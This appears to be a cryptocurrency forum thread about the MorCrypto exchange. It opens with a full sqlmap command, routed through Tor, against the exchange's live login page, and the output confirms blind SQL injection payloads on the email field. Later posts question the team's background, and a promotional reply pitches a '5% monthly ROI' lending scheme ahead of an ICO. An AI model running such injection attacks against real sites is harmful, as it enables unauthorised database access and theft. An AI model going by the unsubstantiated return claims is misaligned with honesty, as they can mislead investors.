Topic: MorCrypto Exchange (Read 256 times)

sqlmap -u 'https://morcex.com:443/mor/home/login' --data='csrf_test_name=2936a17a523389d38520607a055a419b&email=admin&password=password123' --level=5 --risk=3 --random-agent --parse-errors --threads=1 --tor --cookie='csrf_cookie_name=2936a17a523389d38520607a055a419b;ci_session=ed22e99c7ab2b3b027caa366c71a8e23970c0c35;sponsor_id=B0TASK' --hex --current-db --current-user
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.10#stable}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

• starting @ 18:19:33 /2019-10-20/
[18:19:33]

[WARNING] increasing default value for option '--time-sec' to 10 because switch '--tor' was provided
[18:19:33] [INFO] setting Tor SOCKS proxy settings
[18:19:33] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_8; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.0 Safari/532.5' from file '/usr/share/sqlmap/data/txt/user-agents.txt'
POST parameter 'csrf_test_name' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [yCookie parameter 'csrf_cookie_name' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests[18:19:35] [INFO] resuming back-end DBMS 'mysql'
[18:19:35] [INFO] testing connection to the target URL
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[18:19:56] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: csrf_test_name=2936a17a523389d38520607a055a419b&email=admin') RLIKE (SELECT (CASE WHEN (3068=3068) THEN 0x61646d696e ELSE 0x28 END))-- vxxs&password=password123

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf_test_name=2936a17a523389d38520607a055a419b&email=admin') AND (SELECT 4790 FROM (SELECT(SLEEP(10)))QJYq)-- aeLR&password=password123
---
[18:19:56] [INFO] the back-end DBMS is MySQL
web application technology: LiteSpeed
back-end DBMS: MySQL >= 5.0.12

these are the team:



https://morcrypto.net/#team

they don't have linkedin and and your facebook profiles have nothing relevant that shows any past project they have done and had some success.

https://www.facebook.com/chimedatsnare/posts/10216058501202515 ( there's nothing relevant )



Is gospel singer, Song writer, Composer and Rapper

Source: https://twitter.com/OfficialSirVic



is singer

Source: https://fanlink.to/VeraChukwu_Closer?fbclid=IwAR3gK1fxuHp5PPgoyIremHvIa42U_HSqNwrS0aP6cruOtKnYlB8jUzgl0mI



I didn't see any experience he has in managing any exchange

2. We think you should visit our website https://morcrypto.net and read about our module so you can clearly understand the idea behind the 5% ROI and how rewards will be paid. We understand your plight, but that should not stop you from making findings.

3. There were no bots hired, just enthusiasts trying to grab some MOR coin. We had our airdrop and that was a result of the community's excitement at a great project idea. We are not sure admins will allow bots on bitcointalk forum, except you are accusing the admins of allowing bots in the forums.

Our ICO is launching in a few hours, join us and lend MOR coins for 5% monthly ROI in BTC!